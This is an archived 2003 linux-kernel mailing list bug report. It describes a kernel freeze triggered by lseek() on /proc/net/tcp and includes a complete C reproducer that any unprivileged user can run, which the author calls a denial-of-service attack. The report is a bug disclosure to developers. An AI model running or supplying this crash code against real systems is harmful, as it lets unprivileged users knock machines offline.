[BUG] scheduling while atomic when lseek()ing in /proc/net/tcp

From: Tore Anderson
Date: Thu Nov 27 2003 - 18:06:47 EST

Next message: Tim Cambrant: "2.6.0-test11 setup.S assembler messages"
Previous message: Felipe Alfaro Solana: "Re: [PATCH 2.6]: IPv6: strcpy -> strlcpy"
Next in thread: Raj: "Re: [BUG] scheduling while atomic when lseek()ing in /proc/net/tcp"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

The following code instantly freezes my all of my machines running
any of the beavers:

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>

int main(void) {
char buf[8192];
int fd, chars;
fd = open("/proc/net/tcp", O_RDONLY);
chars = read(fd, buf, sizeof(buf));
lseek(fd, -chars+1, SEEK_CUR);
close(fd);
return 0;
}

It only happens when I lseek() anywhere from -chars+1 to -chars+150
inclusive (in other words, somewhere on the first line). I do not
need root to abuse this, which makes it an excellent DoS attack for
anyone with an unprivileged account.

I do get an oops, but as I do not have a serial console I'd rather
not transcribe it to paper and post it unless it's crucial to
pinpointing the bug.

--
Tore Anderson

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

Next message: Tim Cambrant: "2.6.0-test11 setup.S assembler messages"
Previous message: Felipe Alfaro Solana: "Re: [PATCH 2.6]: IPv6: strcpy -> strlcpy"
Next in thread: Raj: "Re: [BUG] scheduling while atomic when lseek()ing in /proc/net/tcp"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]